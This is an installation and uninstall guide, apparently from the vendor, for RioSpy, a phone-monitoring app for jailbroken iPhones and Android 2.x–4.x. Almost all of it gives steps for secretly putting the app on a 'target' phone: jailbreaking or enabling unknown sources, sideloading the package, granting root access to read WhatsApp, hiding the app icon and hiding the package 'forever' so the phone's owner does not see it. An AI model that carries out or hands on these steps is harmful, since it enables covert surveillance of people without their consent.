RioSpy is compatible with iDevice: All jailbreak 3G, 3GS, 4, 4S, 5 iPhone, iPad and Android: 2.x – 4.x. If your phone is compatible then the next thing you need to do is to install the application.
How to install RioSPY on iPhone?
RioSpy currently support all iPhone devices so you should be able to install RioSpy on iPhone without any problem. Before you can install RioSpy app on iPhone you will need to jailbreak the phone. Jailbreak is a simple procedure and it does not affect on your iPhone functionality. Also if you want to install RioSpy on iPhone you will need Cydia application. RioSpy does not provide support or instructions on how to jailbreak your iPhone but there are many sites that provide you with this informations.
Once you jailbreak the iPhone follow next instructions:
- Click on “Cydia” app.
- Click “Manage” at the bottom – “Sources” – “Edit” at the top – “Add” at the top.
- Type: “iphone.riospy.com” and then click on the “Add Source”.
- Wait for updating process to finish and the click on “Return to Cydia”.
- Select “RioSpy” and then click on “RioSpy”.
- Click on “Install” at the top – “Confirm” – “Restart Springboard”.
- Now select “RioSpy” app and “login” to your account (if you don’t have RioSpy account then you need to select “Register” and create account).
- Click on “Yes”.
- Device is now registered to account. Note! Make sure that you enter a valid email because from this account you will view logs later and one account can only be used for one device.
- Click on “Hide Icon From Springboard” – “Yes”.
- To show icon RioSPY again, dial “#999*”.
- Click on “Hide Package Forever” – “Yes”.
How to install RioSPY on iPhone 4?
RioSpy currently support iPhone 4 and all other iPhone devices so you should be able to install RioSpy on iPhone 4 without any problem. Of course it will need to be jailbreak before you can install RioSpy app on it. Also the installation of RioSpy on iPhone requires Cydia application.
For more info about how to install RioSpy on iPhone devices check user guide:
RioSpy Android install?
RioSpy is compatibile with android 2.x – 4.x. First thing you will need to do if you want to install RioSpy on android device is to set up the phone to accept app from unknown sources. To do that click on the phone “Settings” – “Applications” – make sure that “Unknown Sources” tab is activated. After you have configured target android device then you can download and install RioSpy app.
To install RioSpy on android follow next instructions:
- Open web browser and enter a link for download:
- Click on “Download”.
- From the target phone go to the “Download History” and then click – “Rio.apk” file – “Install button” – “Open”.
- Dial ”#999*” – press “Call”.
- Click on “Already a Riospy user” (if you don’t have RioSpy account then you need to select “New user” and create account).
- Insert email, password and then click on “Add this device”.
- If target device is rooted click on “Allow” to use functions like Whatsapp.
- After you log in successfully, restart target device to hide RioSPY icon on target phone.
How to uninstall RioSpy from iPhone?
If you want to finish your monitoring you need to uninstall the RioSpy from the target phone. You need to do that remotely becouse it does not appear in Cydia. To uninstall RioSpy from the iPhone follow next instruction:
- Login to your account
- Go to Setting – Uninstall
- Insert account password
- Click on Uninstall RioSpy
How to uninstall RioSpy from Android?
To remove RioSpy from the target android phone you will need to do the following:
- Open RioSpy app interface.
- Tap „Menu“.
- Tap „Uninstall“.